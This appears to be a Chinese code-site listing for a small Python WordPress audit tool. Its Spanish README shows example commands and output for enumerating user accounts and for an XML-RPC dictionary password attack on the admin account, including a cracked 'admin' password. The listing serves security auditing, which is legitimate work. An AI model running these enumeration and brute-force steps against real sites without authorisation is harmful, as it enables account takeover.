wordpress-security

所属分类:建站系统
开发工具:Python
文件大小:3KB
下载次数:0
上传日期:2014-10-05 20:09:06
上 传 者sh-1993
说明:  Herramientas relacionadas新闻发布会
(Herramientas relacionadas con wordpress)

文件列表:
dict.txt (71, 2014-10-06)
wpcrack.py (6896, 2014-10-06)

wordpress-security ==================

wpcrack.py

Script para auditar la seguridad de un wordpress. Funcionalidades actuales:

  • Enumeracion de usuarios tanto por GET como por POST.
  • Ataque de diccionario utilizando el servicio XML-RPC.

Ejemplo de enumeracion de usuarios con id menor o igual a 10 utilizando peticiones POST:

$ python wpcrack.py --quiet --url http://target/ enumerate -m POST
[+] User found (uid: 4): theboss
[+] User found (uid: 3): user2
[+] User found (uid: 2): user1
[+] User found (uid: 1): admin

Ejemplo de ataque de diccionario a la cuenta de admin mostrando tambien las peticiones erroneas:
$ python wpcrack.py --url http://target/ bruteforce -u admin -w dict.txt
[-] The password '1234admin' doesn't match
[-] The password '1234password' doesn't match
[-] The password 'password' doesn't match
[-] The password 'pass1234' doesn't match
[-] The password 'adminstrator' doesn't match
[-] The password '123456' doesn't match
[-] The password '1234' doesn't match

[+] Username: admin
[+] Password: admin
[+] Profile : administrator

Agradecimientos por sus sugerencias a J. M. Fernandez, @TheXC3LL


近期下载者

相关文件


收藏者